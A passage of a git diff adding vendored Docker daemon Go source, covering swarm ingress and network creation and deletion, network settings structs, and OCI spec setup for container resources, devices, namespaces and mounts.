+	c.WalkNetworks(l)
+
+	return list
+}
+
+// getAllNetworks returns a list containing all networks
+func (daemon *Daemon) getAllNetworks() []libnetwork.Network {
+	c := daemon.netController
+	list := []libnetwork.Network{}
+	l := func(nw libnetwork.Network) bool {
+		list = append(list, nw)
+		return false
+	}
+	c.WalkNetworks(l)
+
+	return list
+}
+
+func isIngressNetwork(name string) bool {
+	return name == "ingress"
+}
+
+var ingressChan = make(chan struct{}, 1)
+
+func ingressWait() func() {
+	ingressChan <- struct{}{}
+	return func() { <-ingressChan }
+}
+
+// SetupIngress setups ingress networking.
+func (daemon *Daemon) SetupIngress(create clustertypes.NetworkCreateRequest, nodeIP string) error {
+	ip, _, err := net.ParseCIDR(nodeIP)
+	if err != nil {
+		return err
+	}
+
+	go func() {
+		controller := daemon.netController
+		controller.AgentInitWait()
+
+		if n, err := daemon.GetNetworkByName(create.Name); err == nil && n != nil && n.ID() != create.ID {
+			if err := controller.SandboxDestroy("ingress-sbox"); err != nil {
+				logrus.Errorf("Failed to delete stale ingress sandbox: %v", err)
+				return
+			}
+
+			// Cleanup any stale endpoints that might be left over during previous iterations
+			epList := n.Endpoints()
+			for _, ep := range epList {
+				if err := ep.Delete(true); err != nil {
+					logrus.Errorf("Failed to delete endpoint %s (%s): %v", ep.Name(), ep.ID(), err)
+				}
+			}
+
+			if err := n.Delete(); err != nil {
+				logrus.Errorf("Failed to delete stale ingress network %s: %v", n.ID(), err)
+				return
+			}
+		}
+
+		if _, err := daemon.createNetwork(create.NetworkCreateRequest, create.ID, true); err != nil {
+			// If it is any other error other than already
+			// exists error log error and return.
+			if _, ok := err.(libnetwork.NetworkNameError); !ok {
+				logrus.Errorf("Failed creating ingress network: %v", err)
+				return
+			}
+
+			// Otherwise continue down the call to create or recreate sandbox.
+		}
+
+		n, err := daemon.GetNetworkByID(create.ID)
+		if err != nil {
+			logrus.Errorf("Failed getting ingress network by id after creating: %v", err)
+			return
+		}
+
+		sb, err := controller.NewSandbox("ingress-sbox", libnetwork.OptionIngress())
+		if err != nil {
+			if _, ok := err.(networktypes.ForbiddenError); !ok {
+				logrus.Errorf("Failed creating ingress sandbox: %v", err)
+			}
+			return
+		}
+
+		ep, err := n.CreateEndpoint("ingress-endpoint", libnetwork.CreateOptionIpam(ip, nil, nil, nil))
+		if err != nil {
+			logrus.Errorf("Failed creating ingress endpoint: %v", err)
+			return
+		}
+
+		if err := ep.Join(sb, nil); err != nil {
+			logrus.Errorf("Failed joining ingress sandbox to ingress endpoint: %v", err)
+		}
+
+		if err := sb.EnableService(); err != nil {
+			logrus.WithError(err).Error("Failed enabling service for ingress sandbox")
+		}
+	}()
+
+	return nil
+}
+
+// SetNetworkBootstrapKeys sets the bootstrap keys.
+func (daemon *Daemon) SetNetworkBootstrapKeys(keys []*networktypes.EncryptionKey) error {
+	return daemon.netController.SetKeys(keys)
+}
+
+// UpdateAttachment notifies the attacher about the attachment config.
+func (daemon *Daemon) UpdateAttachment(networkName, networkID, containerID string, config *network.NetworkingConfig) error {
+	if daemon.clusterProvider == nil {
+		return fmt.Errorf("cluster provider is not initialized")
+	}
+
+	if err := daemon.clusterProvider.UpdateAttachment(networkName, containerID, config); err != nil {
+		return daemon.clusterProvider.UpdateAttachment(networkID, containerID, config)
+	}
+
+	return nil
+}
+
+// WaitForDetachment makes the cluster manager wait for detachment of
+// the container from the network.
+func (daemon *Daemon) WaitForDetachment(ctx context.Context, networkName, networkID, taskID, containerID string) error {
+	if daemon.clusterProvider == nil {
+		return fmt.Errorf("cluster provider is not initialized")
+	}
+
+	return daemon.clusterProvider.WaitForDetachment(ctx, networkName, networkID, taskID, containerID)
+}
+
+// CreateManagedNetwork creates an agent network.
+func (daemon *Daemon) CreateManagedNetwork(create clustertypes.NetworkCreateRequest) error {
+	_, err := daemon.createNetwork(create.NetworkCreateRequest, create.ID, true)
+	return err
+}
+
+// CreateNetwork creates a network with the given name, driver and other optional parameters
+func (daemon *Daemon) CreateNetwork(create types.NetworkCreateRequest) (*types.NetworkCreateResponse, error) {
+	resp, err := daemon.createNetwork(create, "", false)
+	if err != nil {
+		return nil, err
+	}
+	return resp, err
+}
+
+func (daemon *Daemon) createNetwork(create types.NetworkCreateRequest, id string, agent bool) (*types.NetworkCreateResponse, error) {
+	// If there is a pending ingress network creation wait here
+	// since ingress network creation can happen via node download
+	// from manager or task download.
+	if isIngressNetwork(create.Name) {
+		defer ingressWait()()
+	}
+
+	if runconfig.IsPreDefinedNetwork(create.Name) && !agent {
+		err := fmt.Errorf("%s is a pre-defined network and cannot be created", create.Name)
+		return nil, apierrors.NewRequestForbiddenError(err)
+	}
+
+	var warning string
+	nw, err := daemon.GetNetworkByName(create.Name)
+	if err != nil {
+		if _, ok := err.(libnetwork.ErrNoSuchNetwork); !ok {
+			return nil, err
+		}
+	}
+	if nw != nil {
+		if create.CheckDuplicate {
+			return nil, libnetwork.NetworkNameError(create.Name)
+		}
+		warning = fmt.Sprintf("Network with name %s (id : %s) already exists", nw.Name(), nw.ID())
+	}
+
+	c := daemon.netController
+	driver := create.Driver
+	if driver == "" {
+		driver = c.Config().Daemon.DefaultDriver
+	}
+
+	nwOptions := []libnetwork.NetworkOption{
+		libnetwork.NetworkOptionEnableIPv6(create.EnableIPv6),
+		libnetwork.NetworkOptionDriverOpts(create.Options),
+		libnetwork.NetworkOptionLabels(create.Labels),
+		libnetwork.NetworkOptionAttachable(create.Attachable),
+	}
+
+	if create.IPAM != nil {
+		ipam := create.IPAM
+		v4Conf, v6Conf, err := getIpamConfig(ipam.Config)
+		if err != nil {
+			return nil, err
+		}
+		nwOptions = append(nwOptions, libnetwork.NetworkOptionIpam(ipam.Driver, "", v4Conf, v6Conf, ipam.Options))
+	}
+
+	if create.Internal {
+		nwOptions = append(nwOptions, libnetwork.NetworkOptionInternalNetwork())
+	}
+	if agent {
+		nwOptions = append(nwOptions, libnetwork.NetworkOptionDynamic())
+		nwOptions = append(nwOptions, libnetwork.NetworkOptionPersist(false))
+	}
+
+	if isIngressNetwork(create.Name) {
+		nwOptions = append(nwOptions, libnetwork.NetworkOptionIngress())
+	}
+
+	n, err := c.NewNetwork(driver, create.Name, id, nwOptions...)
+	if err != nil {
+		return nil, err
+	}
+
+	daemon.pluginRefCount(driver, driverapi.NetworkPluginEndpointType, plugingetter.ACQUIRE)
+	if create.IPAM != nil {
+		daemon.pluginRefCount(create.IPAM.Driver, ipamapi.PluginEndpointType, plugingetter.ACQUIRE)
+	}
+	daemon.LogNetworkEvent(n, "create")
+
+	return &types.NetworkCreateResponse{
+		ID:      n.ID(),
+		Warning: warning,
+	}, nil
+}
+
+func (daemon *Daemon) pluginRefCount(driver, capability string, mode int) {
+	var builtinDrivers []string
+
+	if capability == driverapi.NetworkPluginEndpointType {
+		builtinDrivers = daemon.netController.BuiltinDrivers()
+	} else if capability == ipamapi.PluginEndpointType {
+		builtinDrivers = daemon.netController.BuiltinIPAMDrivers()
+	}
+
+	for _, d := range builtinDrivers {
+		if d == driver {
+			return
+		}
+	}
+
+	if daemon.PluginStore != nil {
+		_, err := daemon.PluginStore.Get(driver, capability, mode)
+		if err != nil {
+			logrus.WithError(err).WithFields(logrus.Fields{"mode": mode, "driver": driver}).Error("Error handling plugin refcount operation")
+		}
+	}
+}
+
+func getIpamConfig(data []network.IPAMConfig) ([]*libnetwork.IpamConf, []*libnetwork.IpamConf, error) {
+	ipamV4Cfg := []*libnetwork.IpamConf{}
+	ipamV6Cfg := []*libnetwork.IpamConf{}
+	for _, d := range data {
+		iCfg := libnetwork.IpamConf{}
+		iCfg.PreferredPool = d.Subnet
+		iCfg.SubPool = d.IPRange
+		iCfg.Gateway = d.Gateway
+		iCfg.AuxAddresses = d.AuxAddress
+		ip, _, err := net.ParseCIDR(d.Subnet)
+		if err != nil {
+			return nil, nil, fmt.Errorf("Invalid subnet %s : %v", d.Subnet, err)
+		}
+		if ip.To4() != nil {
+			ipamV4Cfg = append(ipamV4Cfg, &iCfg)
+		} else {
+			ipamV6Cfg = append(ipamV6Cfg, &iCfg)
+		}
+	}
+	return ipamV4Cfg, ipamV6Cfg, nil
+}
+
+// UpdateContainerServiceConfig updates a service configuration.
+func (daemon *Daemon) UpdateContainerServiceConfig(containerName string, serviceConfig *clustertypes.ServiceConfig) error {
+	container, err := daemon.GetContainer(containerName)
+	if err != nil {
+		return err
+	}
+
+	container.NetworkSettings.Service = serviceConfig
+	return nil
+}
+
+// ConnectContainerToNetwork connects the given container to the given
+// network. If either cannot be found, an err is returned. If the
+// network cannot be set up, an err is returned.
+func (daemon *Daemon) ConnectContainerToNetwork(containerName, networkName string, endpointConfig *network.EndpointSettings) error {
+	if runtime.GOOS == "solaris" {
+		return errors.New("docker network connect is unsupported on Solaris platform")
+	}
+	container, err := daemon.GetContainer(containerName)
+	if err != nil {
+		return err
+	}
+	return daemon.ConnectToNetwork(container, networkName, endpointConfig)
+}
+
+// DisconnectContainerFromNetwork disconnects the given container from
+// the given network. If either cannot be found, an err is returned.
+func (daemon *Daemon) DisconnectContainerFromNetwork(containerName string, networkName string, force bool) error {
+	if runtime.GOOS == "solaris" {
+		return errors.New("docker network disconnect is unsupported on Solaris platform")
+	}
+	container, err := daemon.GetContainer(containerName)
+	if err != nil {
+		if force {
+			return daemon.ForceEndpointDelete(containerName, networkName)
+		}
+		return err
+	}
+	return daemon.DisconnectFromNetwork(container, networkName, force)
+}
+
+// GetNetworkDriverList returns the list of plugins drivers
+// registered for network.
+func (daemon *Daemon) GetNetworkDriverList() []string {
+	if !daemon.NetworkControllerEnabled() {
+		return nil
+	}
+
+	pluginList := daemon.netController.BuiltinDrivers()
+
+	managedPlugins := daemon.PluginStore.GetAllManagedPluginsByCap(driverapi.NetworkPluginEndpointType)
+
+	for _, plugin := range managedPlugins {
+		pluginList = append(pluginList, plugin.Name())
+	}
+
+	pluginMap := make(map[string]bool)
+	for _, plugin := range pluginList {
+		pluginMap[plugin] = true
+	}
+
+	networks := daemon.netController.Networks()
+
+	for _, network := range networks {
+		if !pluginMap[network.Type()] {
+			pluginList = append(pluginList, network.Type())
+			pluginMap[network.Type()] = true
+		}
+	}
+
+	sort.Strings(pluginList)
+
+	return pluginList
+}
+
+// DeleteManagedNetwork deletes an agent network.
+func (daemon *Daemon) DeleteManagedNetwork(networkID string) error {
+	return daemon.deleteNetwork(networkID, true)
+}
+
+// DeleteNetwork destroys a network unless it's one of docker's predefined networks.
+func (daemon *Daemon) DeleteNetwork(networkID string) error {
+	return daemon.deleteNetwork(networkID, false)
+}
+
+func (daemon *Daemon) deleteNetwork(networkID string, dynamic bool) error {
+	nw, err := daemon.FindNetwork(networkID)
+	if err != nil {
+		return err
+	}
+
+	if runconfig.IsPreDefinedNetwork(nw.Name()) && !dynamic {
+		err := fmt.Errorf("%s is a pre-defined network and cannot be removed", nw.Name())
+		return apierrors.NewRequestForbiddenError(err)
+	}
+
+	if err := nw.Delete(); err != nil {
+		return err
+	}
+	daemon.pluginRefCount(nw.Type(), driverapi.NetworkPluginEndpointType, plugingetter.RELEASE)
+	ipamType, _, _, _ := nw.Info().IpamConfig()
+	daemon.pluginRefCount(ipamType, ipamapi.PluginEndpointType, plugingetter.RELEASE)
+	daemon.LogNetworkEvent(nw, "destroy")
+	return nil
+}
+
+// GetNetworks returns a list of all networks
+func (daemon *Daemon) GetNetworks() []libnetwork.Network {
+	return daemon.getAllNetworks()
+}
+
+// clearAttachableNetworks removes the attachable networks
+// after disconnecting any connected container
+func (daemon *Daemon) clearAttachableNetworks() {
+	for _, n := range daemon.GetNetworks() {
+		if !n.Info().Attachable() {
+			continue
+		}
+		for _, ep := range n.Endpoints() {
+			epInfo := ep.Info()
+			if epInfo == nil {
+				continue
+			}
+			sb := epInfo.Sandbox()
+			if sb == nil {
+				continue
+			}
+			containerID := sb.ContainerID()
+			if err := daemon.DisconnectContainerFromNetwork(containerID, n.ID(), true); err != nil {
+				logrus.Warnf("Failed to disconnect container %s from swarm network %s on cluster leave: %v",
+					containerID, n.Name(), err)
+			}
+		}
+		if err := daemon.DeleteManagedNetwork(n.ID()); err != nil {
+			logrus.Warnf("Failed to remove swarm network %s on cluster leave: %v", n.Name(), err)
+		}
+	}
+}
diff --git a/vendor/github.com/docker/docker/daemon/network/settings.go b/vendor/github.com/docker/docker/daemon/network/settings.go
new file mode 100644
index 0000000000..8f6b7dd59e
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/network/settings.go
@@ -0,0 +1,33 @@
+package network
+
+import (
+	networktypes "github.com/docker/docker/api/types/network"
+	clustertypes "github.com/docker/docker/daemon/cluster/provider"
+	"github.com/docker/go-connections/nat"
+)
+
+// Settings stores configuration details about the daemon network config
+// TODO Windows. Many of these fields can be factored out.,
+type Settings struct {
+	Bridge                 string
+	SandboxID              string
+	HairpinMode            bool
+	LinkLocalIPv6Address   string
+	LinkLocalIPv6PrefixLen int
+	Networks               map[string]*EndpointSettings
+	Service                *clustertypes.ServiceConfig
+	Ports                  nat.PortMap
+	SandboxKey             string
+	SecondaryIPAddresses   []networktypes.Address
+	SecondaryIPv6Addresses []networktypes.Address
+	IsAnonymousEndpoint    bool
+	HasSwarmEndpoint       bool
+}
+
+// EndpointSettings is a package local wrapper for
+// networktypes.EndpointSettings which stores Endpoint state that
+// needs to be persisted to disk but not exposed in the api.
+type EndpointSettings struct {
+	*networktypes.EndpointSettings
+	IPAMOperational bool
+}
diff --git a/vendor/github.com/docker/docker/daemon/oci_linux.go b/vendor/github.com/docker/docker/daemon/oci_linux.go
new file mode 100644
index 0000000000..a72b0b873d
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/oci_linux.go
@@ -0,0 +1,790 @@
+package daemon
+
+import (
+	"fmt"
+	"io"
+	"os"
+	"os/exec"
+	"path/filepath"
+	"sort"
+	"strconv"
+	"strings"
+
+	"github.com/Sirupsen/logrus"
+	containertypes "github.com/docker/docker/api/types/container"
+	"github.com/docker/docker/container"
+	"github.com/docker/docker/daemon/caps"
+	"github.com/docker/docker/oci"
+	"github.com/docker/docker/pkg/idtools"
+	"github.com/docker/docker/pkg/mount"
+	"github.com/docker/docker/pkg/stringutils"
+	"github.com/docker/docker/pkg/symlink"
+	"github.com/docker/docker/volume"
+	"github.com/opencontainers/runc/libcontainer/apparmor"
+	"github.com/opencontainers/runc/libcontainer/cgroups"
+	"github.com/opencontainers/runc/libcontainer/devices"
+	"github.com/opencontainers/runc/libcontainer/user"
+	specs "github.com/opencontainers/runtime-spec/specs-go"
+)
+
+func setResources(s *specs.Spec, r containertypes.Resources) error {
+	weightDevices, err := getBlkioWeightDevices(r)
+	if err != nil {
+		return err
+	}
+	readBpsDevice, err := getBlkioThrottleDevices(r.BlkioDeviceReadBps)
+	if err != nil {
+		return err
+	}
+	writeBpsDevice, err := getBlkioThrottleDevices(r.BlkioDeviceWriteBps)
+	if err != nil {
+		return err
+	}
+	readIOpsDevice, err := getBlkioThrottleDevices(r.BlkioDeviceReadIOps)
+	if err != nil {
+		return err
+	}
+	writeIOpsDevice, err := getBlkioThrottleDevices(r.BlkioDeviceWriteIOps)
+	if err != nil {
+		return err
+	}
+
+	memoryRes := getMemoryResources(r)
+	cpuRes := getCPUResources(r)
+	blkioWeight := r.BlkioWeight
+
+	specResources := &specs.Resources{
+		Memory: memoryRes,
+		CPU:    cpuRes,
+		BlockIO: &specs.BlockIO{
+			Weight:                  &blkioWeight,
+			WeightDevice:            weightDevices,
+			ThrottleReadBpsDevice:   readBpsDevice,
+			ThrottleWriteBpsDevice:  writeBpsDevice,
+			ThrottleReadIOPSDevice:  readIOpsDevice,
+			ThrottleWriteIOPSDevice: writeIOpsDevice,
+		},
+		DisableOOMKiller: r.OomKillDisable,
+		Pids: &specs.Pids{
+			Limit: &r.PidsLimit,
+		},
+	}
+
+	if s.Linux.Resources != nil && len(s.Linux.Resources.Devices) > 0 {
+		specResources.Devices = s.Linux.Resources.Devices
+	}
+
+	s.Linux.Resources = specResources
+	return nil
+}
+
+func setDevices(s *specs.Spec, c *container.Container) error {
+	// Build lists of devices allowed and created within the container.
+	var devs []specs.Device
+	devPermissions := s.Linux.Resources.Devices
+	if c.HostConfig.Privileged {
+		hostDevices, err := devices.HostDevices()
+		if err != nil {
+			return err
+		}
+		for _, d := range hostDevices {
+			devs = append(devs, oci.Device(d))
+		}
+		rwm := "rwm"
+		devPermissions = []specs.DeviceCgroup{
+			{
+				Allow:  true,
+				Access: &rwm,
+			},
+		}
+	} else {
+		for _, deviceMapping := range c.HostConfig.Devices {
+			d, dPermissions, err := oci.DevicesFromPath(deviceMapping.PathOnHost, deviceMapping.PathInContainer, deviceMapping.CgroupPermissions)
+			if err != nil {
+				return err
+			}
+			devs = append(devs, d...)
+			devPermissions = append(devPermissions, dPermissions...)
+		}
+	}
+
+	s.Linux.Devices = append(s.Linux.Devices, devs...)
+	s.Linux.Resources.Devices = devPermissions
+	return nil
+}
+
+func setRlimits(daemon *Daemon, s *specs.Spec, c *container.Container) error {
+	var rlimits []specs.Rlimit
+
+	// We want to leave the original HostConfig alone so make a copy here
+	hostConfig := *c.HostConfig
+	// Merge with the daemon defaults
+	daemon.mergeUlimits(&hostConfig)
+	for _, ul := range hostConfig.Ulimits {
+		rlimits = append(rlimits, specs.Rlimit{
+			Type: "RLIMIT_" + strings.ToUpper(ul.Name),
+			Soft: uint64(ul.Soft),
+			Hard: uint64(ul.Hard),
+		})
+	}
+
+	s.Process.Rlimits = rlimits
+	return nil
+}
+
+func setUser(s *specs.Spec, c *container.Container) error {
+	uid, gid, additionalGids, err := getUser(c, c.Config.User)
+	if err != nil {
+		return err
+	}
+	s.Process.User.UID = uid
+	s.Process.User.GID = gid
+	s.Process.User.AdditionalGids = additionalGids
+	return nil
+}
+
+func readUserFile(c *container.Container, p string) (io.ReadCloser, error) {
+	fp, err := symlink.FollowSymlinkInScope(filepath.Join(c.BaseFS, p), c.BaseFS)
+	if err != nil {
+		return nil, err
+	}
+	return os.Open(fp)
+}
+
+func getUser(c *container.Container, username string) (uint32, uint32, []uint32, error) {
+	passwdPath, err := user.GetPasswdPath()
+	if err != nil {
+		return 0, 0, nil, err
+	}
+	groupPath, err := user.GetGroupPath()
+	if err != nil {
+		return 0, 0, nil, err
+	}
+	passwdFile, err := readUserFile(c, passwdPath)
+	if err == nil {
+		defer passwdFile.Close()
+	}
+	groupFile, err := readUserFile(c, groupPath)
+	if err == nil {
+		defer groupFile.Close()
+	}
+
+	execUser, err := user.GetExecUser(username, nil, passwdFile, groupFile)
+	if err != nil {
+		return 0, 0, nil, err
+	}
+
+	// todo: fix this double read by a change to libcontainer/user pkg
+	groupFile, err = readUserFile(c, groupPath)
+	if err == nil {
+		defer groupFile.Close()
+	}
+	var addGroups []int
+	if len(c.HostConfig.GroupAdd) > 0 {
+		addGroups, err = user.GetAdditionalGroups(c.HostConfig.GroupAdd, groupFile)
+		if err != nil {
+			return 0, 0, nil, err
+		}
+	}
+	uid := uint32(execUser.Uid)
+	gid := uint32(execUser.Gid)
+	sgids := append(execUser.Sgids, addGroups...)
+	var additionalGids []uint32
+	for _, g := range sgids {
+		additionalGids = append(additionalGids, uint32(g))
+	}
+	return uid, gid, additionalGids, nil
+}
+
+func setNamespace(s *specs.Spec, ns specs.Namespace) {
+	for i, n := range s.Linux.Namespaces {
+		if n.Type == ns.Type {
+			s.Linux.Namespaces[i] = ns
+			return
+		}
+	}
+	s.Linux.Namespaces = append(s.Linux.Namespaces, ns)
+}
+
+func setCapabilities(s *specs.Spec, c *container.Container) error {
+	var caplist []string
+	var err error
+	if c.HostConfig.Privileged {
+		caplist = caps.GetAllCapabilities()
+	} else {
+		caplist, err = caps.TweakCapabilities(s.Process.Capabilities, c.HostConfig.CapAdd, c.HostConfig.CapDrop)
+		if err != nil {
+			return err
+		}
+	}
+	s.Process.Capabilities = caplist
+	return nil
+}
+
+func setNamespaces(daemon *Daemon, s *specs.Spec, c *container.Container) error {
+	userNS := false
+	// user
+	if c.HostConfig.UsernsMode.IsPrivate() {
+		uidMap, gidMap := daemon.GetUIDGIDMaps()
+		if uidMap != nil {
+			userNS = true
+			ns := specs.Namespace{Type: "user"}
+			setNamespace(s, ns)
+			s.Linux.UIDMappings = specMapping(uidMap)
+			s.Linux.GIDMappings = specMapping(gidMap)
+		}
+	}
+	// network
+	if !c.Config.NetworkDisabled {
+		ns := specs.Namespace{Type: "network"}
+		parts := strings.SplitN(string(c.HostConfig.NetworkMode), ":", 2)
+		if parts[0] == "container" {
+			nc, err := daemon.getNetworkedContainer(c.ID, c.HostConfig.NetworkMode.ConnectedContainer())
+			if err != nil {
+				return err
+			}
+			ns.Path = fmt.Sprintf("/proc/%d/ns/net", nc.State.GetPID())
+			if userNS {
+				// to share a net namespace, they must also share a user namespace
+				nsUser := specs.Namespace{Type: "user"}
+				nsUser.Path = fmt.Sprintf("/proc/%d/ns/user", nc.State.GetPID())
+				setNamespace(s, nsUser)
+			}
+		} else if c.HostConfig.NetworkMode.IsHost() {
+			ns.Path = c.NetworkSettings.SandboxKey
+		}
+		setNamespace(s, ns)
+	}
+	// ipc
+	if c.HostConfig.IpcMode.IsContainer() {
+		ns := specs.Namespace{Type: "ipc"}
+		ic, err := daemon.getIpcContainer(c)
+		if err != nil {
+			return err
+		}
+		ns.Path = fmt.Sprintf("/proc/%d/ns/ipc", ic.State.GetPID())
+		setNamespace(s, ns)
+		if userNS {
+			// to share an IPC namespace, they must also share a user namespace
+			nsUser := specs.Namespace{Type: "user"}
+			nsUser.Path = fmt.Sprintf("/proc/%d/ns/user", ic.State.GetPID())
+			setNamespace(s, nsUser)
+		}
+	} else if c.HostConfig.IpcMode.IsHost() {
+		oci.RemoveNamespace(s, specs.NamespaceType("ipc"))
+	} else {
+		ns := specs.Namespace{Type: "ipc"}
+		setNamespace(s, ns)
+	}
+	// pid
+	if c.HostConfig.PidMode.IsContainer() {
+		ns := specs.Namespace{Type: "pid"}
+		pc, err := daemon.getPidContainer(c)
+		if err != nil {
+			return err
+		}
+		ns.Path = fmt.Sprintf("/proc/%d/ns/pid", pc.State.GetPID())
+		setNamespace(s, ns)
+		if userNS {
+			// to share a PID namespace, they must also share a user namespace
+			nsUser := specs.Namespace{Type: "user"}
+			nsUser.Path = fmt.Sprintf("/proc/%d/ns/user", pc.State.GetPID())
+			setNamespace(s, nsUser)
+		}
+	} else if c.HostConfig.PidMode.IsHost() {
+		oci.RemoveNamespace(s, specs.NamespaceType("pid"))
+	} else {
+		ns := specs.Namespace{Type: "pid"}
+		setNamespace(s, ns)
+	}
+	// uts
+	if c.HostConfig.UTSMode.IsHost() {
+		oci.RemoveNamespace(s, specs.NamespaceType("uts"))
+		s.Hostname = ""
+	}
+
+	return nil
+}
+
+func specMapping(s []idtools.IDMap) []specs.IDMapping {
+	var ids []specs.IDMapping
+	for _, item := range s {
+		ids = append(ids, specs.IDMapping{
+			HostID:      uint32(item.HostID),
+			ContainerID: uint32(item.ContainerID),
+			Size:        uint32(item.Size),
+		})
+	}
+	return ids
+}
+
+func getMountInfo(mountinfo []*mount.Info, dir string) *mount.Info {
+	for _, m := range mountinfo {
+		if m.Mountpoint == dir {
+			return m
+		}
+	}
+	return nil
+}
+
+// Get the source mount point of directory passed in as argument. Also return
+// optional fields.
+func getSourceMount(source string) (string, string, error) {
+	// Ensure any symlinks are resolved.
+	sourcePath, err := filepath.EvalSymlinks(source)
+	if err != nil {
+		return "", "", err
+	}
+
+	mountinfos, err := mount.GetMounts()
+	if err != nil {
+		return "", "", err
+	}
+
+	mountinfo := getMountInfo(mountinfos, sourcePath)
+	if mountinfo != nil {
+		return sourcePath, mountinfo.Optional, nil
+	}
+
+	path := sourcePath
+	for {
+		path = filepath.Dir(path)
+
+		mountinfo = getMountInfo(mountinfos, path)
+		if mountinfo != nil {
+			return path, mountinfo.Optional, nil
+		}
+
+		if path == "/" {
+			break
+		}
+	}
+
+	// If we are here, we did not find parent mount. Something is wrong.
+	return "", "", fmt.Errorf("Could not find source mount of %s", source)
+}
+
+// Ensure mount point on which path is mounted, is shared.
+func ensureShared(path string) error {
+	sharedMount := false
+
+	sourceMount, optionalOpts, err := getSourceMount(path)
+	if err != nil {
+		return err
+	}
+	// Make sure source mount point is shared.
+	optsSplit := strings.Split(optionalOpts, " ")
+	for _, opt := range optsSplit {
+		if strings.HasPrefix(opt, "shared:") {
+			sharedMount = true
+			break
+		}
+	}
+
+	if !sharedMount {
+		return fmt.Errorf("Path %s is mounted on %s but it is not a shared mount.", path, sourceMount)
+	}
+	return nil
+}
+
+// Ensure mount point on which path is mounted, is either shared or slave.
+func ensureSharedOrSlave(path string) error {
+	sharedMount := false
+	slaveMount := false
+
+	sourceMount, optionalOpts, err := getSourceMount(path)
+	if err != nil {
+		return err
+	}
+	// Make sure source mount point is shared.
+	optsSplit := strings.Split(optionalOpts, " ")
+	for _, opt := range optsSplit {
+		if strings.HasPrefix(opt, "shared:") {
+			sharedMount = true
+			break
+		} else if strings.HasPrefix(opt, "master:") {
+			slaveMount = true
+			break
+		}
+	}
+
+	if !sharedMount && !slaveMount {
+		return fmt.Errorf("Path %s is mounted on %s but it is not a shared or slave mount.", path, sourceMount)
+	}
+	return nil
+}
+
+var (
+	mountPropagationMap = map[string]int{
+		"private":  mount.PRIVATE,
+		"rprivate": mount.RPRIVATE,
+		"shared":   mount.SHARED,
+		"rshared":  mount.RSHARED,
+		"slave":    mount.SLAVE,
+		"rslave":   mount.RSLAVE,
+	}
+
+	mountPropagationReverseMap = map[int]string{
+		mount.PRIVATE:  "private",
+		mount.RPRIVATE: "rprivate",
+		mount.SHARED:   "shared",
+		mount.RSHARED:  "rshared",
+		mount.SLAVE:    "slave",
+		mount.RSLAVE:   "rslave",
+	}
+)
+
+func setMounts(daemon *Daemon, s *specs.Spec, c *container.Container, mounts []container.Mount) error {
+	userMounts := make(map[string]struct{})
+	for _, m := range mounts {
+		userMounts[m.Destination] = struct{}{}
+	}
+
+	// Filter out mounts that are overridden by user supplied mounts
+	var defaultMounts []specs.Mount
+	_, mountDev := userMounts["/dev"]
+	for _, m := range s.Mounts {
+		if _, ok := userMounts[m.Destination]; !ok {
+			if mountDev && strings.HasPrefix(m.Destination, "/dev/") {
+				continue
+			}
+			defaultMounts = append(defaultMounts, m)
+		}
+	}
+
+	s.Mounts = defaultMounts
+	for _, m := range mounts {
+		for _, cm := range s.Mounts {
+			if cm.Destination == m.Destination {
+				return fmt.Errorf("Duplicate mount point '%s'", m.Destination)
+			}
+		}
+
+		if m.Source == "tmpfs" {
+			data := m.Data
+			options := []string{"noexec", "nosuid", "nodev", string(volume.DefaultPropagationMode)}
+			if data != "" {
+				options = append(options, strings.Split(data, ",")...)
+			}
+
+			merged, err := mount.MergeTmpfsOptions(options)
+			if err != nil {
+				return err
+			}
+
+			s.Mounts = append(s.Mounts, specs.Mount{Destination: m.Destination, Source: m.Source, Type: "tmpfs", Options: merged})
+			continue
+		}
+
+		mt := specs.Mount{Destination: m.Destination, Source: m.Source, Type: "bind"}
+
+		// Determine property of RootPropagation based on volume
+		// properties. If a volume is shared, then keep root propagation
+		// shared. This should work for slave and private volumes too.
+		//
+		// For slave volumes, it can be either [r]shared/[r]slave.
+		//
+		// For private volumes any root propagation value should work.
+		pFlag := mountPropagationMap[m.Propagation]
+		if pFlag == mount.SHARED || pFlag == mount.RSHARED {
+			if err := ensureShared(m.Source); err != nil {
+				return err
+			}
+			rootpg := mountPropagationMap[s.Linux.RootfsPropagation]
+			if rootpg != mount.SHARED && rootpg != mount.RSHARED {
+				s.Linux.RootfsPropagation = mountPropagationReverseMap[mount.SHARED]
+			}
+		} else if pFlag == mount.SLAVE || pFlag == mount.RSLAVE {
+			if err := ensureSharedOrSlave(m.Source); err != nil {
+				return err
+			}
+			rootpg := mountPropagationMap[s.Linux.RootfsPropagation]
+			if rootpg != mount.SHARED && rootpg != mount.RSHARED && rootpg != mount.SLAVE && rootpg != mount.RSLAVE {
+				s.Linux.RootfsPropagation = mountPropagationReverseMap[mount.RSLAVE]
+			}
+		}
+
+		opts := []string{"rbind"}
+		if !m.Writable {
+			opts = append(opts, "ro")
+		}
+		if pFlag != 0 {
+			opts = append(opts, mountPropagationReverseMap[pFlag])
+		}
+
+		mt.Options = opts
+		s.Mounts = append(s.Mounts, mt)
+	}
+
+	if s.Root.Readonly {
+		for i, m := range s.Mounts {
+			switch m.Destination {
+			case "/proc", "/dev/pts", "/dev/mqueue": // /dev is remounted by runc
+				continue
+			}
+			if _, ok := userMounts[m.Destination]; !ok {
+				if !stringutils.InSlice(m.Options, "ro") {
+					s.Mounts[i].Options = append(s.Mounts[i].Options, "ro")
+				}
+			}
+		}
+	}
+
+	if c.HostConfig.Privileged {
+		if !s.Root.Readonly {
+			// clear readonly for /sys
+			for i := range s.Mounts {
+				if s.Mounts[i].Destination == "/sys" {
+					clearReadOnly(&s.Mounts[i])
+				}
+			}
+		}
+		s.Linux.ReadonlyPaths = nil
+		s.Linux.MaskedPaths = nil
+	}
+
+	// TODO: until a kernel/mount solution exists for handling remount in a user namespace,
+	// we must clear the readonly flag for the cgroups mount (@mrunalp concurs)
+	if uidMap, _ := daemon.GetUIDGIDMaps(); uidMap != nil || c.HostConfig.Privileged {
+		for i, m := range s.Mounts {
+			if m.Type == "cgroup" {
+				clearReadOnly(&s.Mounts[i])
+			}
+		}
+	}
+
+	return nil
+}
+
+func (daemon *Daemon) populateCommonSpec(s *specs.Spec, c *container.Container) error {
+	linkedEnv, err := daemon.setupLinkedContainers(c)
+	if err != nil {
+		return err
+	}
+	s.Root = specs.Root{
+		Path:     c.BaseFS,
+		Readonly: c.HostConfig.ReadonlyRootfs,
+	}
+	rootUID, rootGID := daemon.GetRemappedUIDGID()
